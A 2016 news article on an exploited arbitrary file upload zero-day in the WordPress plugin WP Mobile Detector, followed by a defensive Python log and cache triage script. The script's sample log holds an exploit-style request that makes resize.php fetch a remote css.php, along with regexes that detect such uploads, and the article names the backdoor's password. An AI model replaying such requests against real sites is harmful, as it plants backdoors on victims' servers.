Over 10,000 sites were exposed to hacking

Jun 3, 2016 01:40 GMT

Attackers have been using a newly discovered zero-day in the WP Mobile Detector plugin to upload backdoor scripts on WordPress sites and are currently employing it to upload adult-themed SEO spam on affected websites.

The WP Mobile Detector plugin is a simple tool that detects mobile users and allows webmasters to load a specific mobile-friendly theme based on the user's device.

Zero-day is in the plugin's image upload & resize script

The team at Plugin Vulnerabilities has discovered that the plugin features an arbitrary file upload vulnerability in the "/wp-content/plugins/wp-mobile-detector/resize.php" file.

This file handles image uploads, and according to the researchers who discovered the security bug, it lacks basic input filtering, allowing an attacker to pass a malicious file that gets uploaded to the plugin's /cache directory.

Using this vulnerability, attackers can upload PHP-based backdoors on WordPress sites, something that should have been almost impossible in 2016, after almost two decades of PHP coding and basic lessons in file upload security.

Zero-day exploited since May 26, 2015

The Plugin Vulnerabilities team says it discovered this vulnerability on May 29, when it also notified the developer. Two days later, the team also alerted Automattic, which removed the plugin from the WordPress.org Plugin Directory.

At the time it was removed, the plugin had over 10,000 installs. In the meantime, the developer patched his plugin, which was re-uploaded to the Plugin Directory, but now there are only around 1,000 users running the plugin on their sites, after webmasters rushed to uninstall the insecure extension.

Many did so because US security firm Sucuri revealed that its Web Application Firewall had detected attacks using this vulnerability since May 26, three days before the Plugin Vulnerabilities team discovered it, and five days before Automattic removed the plugin from the Plugin Directory.

Hackers uploaded a backdoor on the site with the password "dinamit"

Sucuri's Douglas Santos says the vulnerability is trivial to exploit and the backdoor script (css.php) works with the "dinamit" password, the Russian word for dynamite.

The WP Mobile Detector zero-day works regardless of what image processing library is installed on the server, so there's no connection to the ImageTragick vulnerability.

The Plugin Vulnerabilities team says the only condition is that the server has PHP's allow_url_fopen option enabled. WP Mobile Detector version 3.6 fixed the zero-day, and the plugin has since been updated to version 3.7.
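As an added example (not code from the article, Sucuri or the plugin), a small Python triage script a site owner could run after the fact. It flags access-log requests to resize.php whose query points at a remote URL or a .php file, which is the pattern the allow_url_fopen requirement implies, and lists files in the plugin's cache directory that contain PHP code whatever their extension. The query-parameter name "src", the combined log format and the sample files are assumptions constructed for this example.

```python
import os
import re
import tempfile
RESIZE_PATH = "/wp-content/plugins/wp-mobile-detector/resize.php"
# Request part of a combined-format access log line: "GET /path?q HTTP/1.1" 200
REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# A resize cache should hold only image bytes; a PHP open tag is a red flag.
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
# Constructed log lines, not from a real incident. The "src" parameter name
# is an assumption: the article does not say which parameter resize.php read.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/May/2016:10:01:02 +0000] "GET ' + RESIZE_PATH
    + '?src=http://198.51.100.7/css.php HTTP/1.1" 200 512',
    '198.51.100.20 - - [26/May/2016:10:02:10 +0000] "GET ' + RESIZE_PATH
    + '?src=wp-content/uploads/logo.png&w=320 HTTP/1.1" 200 8192',
]

def suspicious_requests(log_lines):
    """(path, status) for resize.php hits whose query names a remote URL or .php file."""
    hits = []
    for line in log_lines:
        m = REQ.search(line)
        if not m or not m.group(1).startswith(RESIZE_PATH):
            continue
        query = m.group(1).partition("?")[2].lower()
        if re.search(r"https?(:|%3a)|\.php(\b|%00)", query):
            hits.append((m.group(1), int(m.group(2))))
    return hits

def php_files_in_cache(cache_dir):
    """Relative paths of cache files holding PHP code, whatever the extension."""
    found = []
    for root, _, files in os.walk(cache_dir):
        for name in files:
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                if PHP_TAG.search(fh.read(65536)):
                    found.append(os.path.relpath(full, cache_dir))
    return sorted(found)

def demo_cache_dir():
    """Constructed cache dir: a clean PNG, a css.php, and PHP behind a .jpg name."""
    d = tempfile.mkdtemp(prefix="wpmd-cache-")
    samples = {"logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 64,
               "css.php": b"<?php echo 'constructed sample'; ?>",
               "thumb.jpg": b"GIF89a<?php echo 'constructed sample'; ?>"}
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    return d
```

Point `php_files_in_cache` at the real cache directory of an affected install; any hit should be treated as a compromise, not just a bad upload, since the article notes attackers used the foothold for SEO spam.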

Image: WP Mobile Detector settings panel
Image: Crooks used zero-day in WP Mobile Detector plugin